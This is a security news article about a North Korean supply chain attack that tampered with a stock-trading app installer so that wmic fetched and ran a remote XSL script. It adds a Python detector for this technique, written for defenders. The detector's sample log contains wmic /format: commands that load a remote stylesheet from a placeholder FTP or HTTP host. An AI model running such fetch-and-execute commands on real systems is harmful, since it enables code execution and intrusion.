North Korean software supply chain attack targets stock investors (Security News, January 2021)
North Korean hacking group Thallium has targeted users of a private stock investment messenger service in a software supply chain attack, according to a report published this week.
Attackers alter the installer of a stock investment app.
Within the legitimate installer of the stock investment platform, the attackers injected commands that fetched a malicious XSL script from a rogue FTP server and executed it on Windows systems through the built-in wmic utility (the WMI command-line tool), which loads and runs a caller-supplied stylesheet when one is passed via its /format: switch.
Excel macros also used to deliver the payload.
ESTsecurity researchers also observed Microsoft Office documents, such as Excel spreadsheets containing macros, distributing the same XSL script payload. "ESRC is paying attention to the fact that the Thallium organization is using the 'XSL Script Processing' technique not only in spear phishing attacks based on malicious documents, but also for niche attacks including supply chain attacks," stated ESTsecurity researchers in their translated report.
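The detection side of the technique described above, as an added example that is not from the ESTsecurity report or this article: wmic's /format: switch normally names one of its stock output formats, so a wmic process launch whose /format: value is a URL (the article's FTP case), a UNC path or an arbitrary local .xsl file is the signal a defender hunts for. The log lines, the Sysmon-style field names and the 203.0.113.x addresses below are constructed for the example, and the built-in format list is the one shipped with wmic.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

# Output formats that ship with wmic (they map to stylesheets under
# %WINDIR%\System32\wbem). Anything else passed to /format: is a
# caller-supplied XSL stylesheet that wmic will load and execute.
BUILTIN_FORMATS = {
    "list", "csv", "hform", "htable", "mof", "rawxml", "table",
    "texttable", "textvaluelist", "value", "xml",
}
REMOTE_SCHEMES = {"http", "https", "ftp"}

# /format: value, either quoted with " or ' or given as a bare token
FORMAT_RE = re.compile(r"""/format\s*:\s*(?:"([^"]*)"|'([^']*)'|(\S+))""", re.IGNORECASE)
# Minimal parser for the constructed log format used below (assumption, not a real schema)
IMAGE_RE = re.compile(r"Image=(\S+)")
CMDLINE_RE = re.compile(r"CommandLine=(.*)$")


@dataclass
class Finding:
    line_no: int
    image: str
    format_target: str
    reason: str


def extract_format_target(cmdline: str) -> Optional[str]:
    """Return the value passed to /format:, or None if the switch is absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def classify_format_target(target: str) -> Optional[str]:
    """Describe why a /format: target is suspicious, or None if it is a stock format."""
    value = target.strip().strip("\"'")
    # wmic accepts "csv:ParamName=Value"; only the part before ':' names the format
    name = value.split(":", 1)[0].lower()
    if name in BUILTIN_FORMATS:
        return None
    scheme = urlparse(value).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return f"remote XSL stylesheet fetched over {scheme}"
    if value.startswith("\\\\"):
        return "XSL stylesheet loaded from a UNC share"
    return "non-builtin XSL stylesheet loaded from a local path"


def scan_log(lines: List[str]) -> List[Finding]:
    """Flag wmic launches whose /format: points at a caller-supplied stylesheet."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        img = IMAGE_RE.search(line)
        cmd = CMDLINE_RE.search(line)
        if not img or not cmd:
            continue
        image = img.group(1)
        # Matching on the image name is the simple case; real telemetry should
        # also check OriginalFileName (Sysmon) so a renamed copy is not missed.
        if image.rsplit("\\", 1)[-1].lower() != "wmic.exe":
            continue
        target = extract_format_target(cmd.group(1))
        if target is None:
            continue
        reason = classify_format_target(target)
        if reason:
            findings.append(Finding(n, image, target, reason))
    return findings


# Constructed process-creation events (Sysmon-style fields, not real telemetry).
SAMPLE_LOG = [
    r"EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic os get caption /format:list",
    r'EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic process list /format:"ftp://203.0.113.10/pub/update.xsl"',
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -Command Get-Process",
    r"EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic os get /format:http://203.0.113.10/a.xsl",
    r"EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic os get /format:csv",
    r"EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic os get /format:C:\Users\Public\report.xsl",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason} ({f.format_target})")
```

Only the stock format names are whitelisted, so the rule fires on any stylesheet the caller supplies rather than on a blocklist of URLs; the remote-scheme case is the highest-confidence one, while a local or UNC .xsl is worth a look but may be a legitimate custom report in some environments.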
Whether the goal behind this attack was monetary gain or espionage against traders, supply chain attacks have become commonplace.
Last month, attackers targeted the open-source ecosystem RubyGems in a software supply chain attack to steal cryptocurrency from infected machines.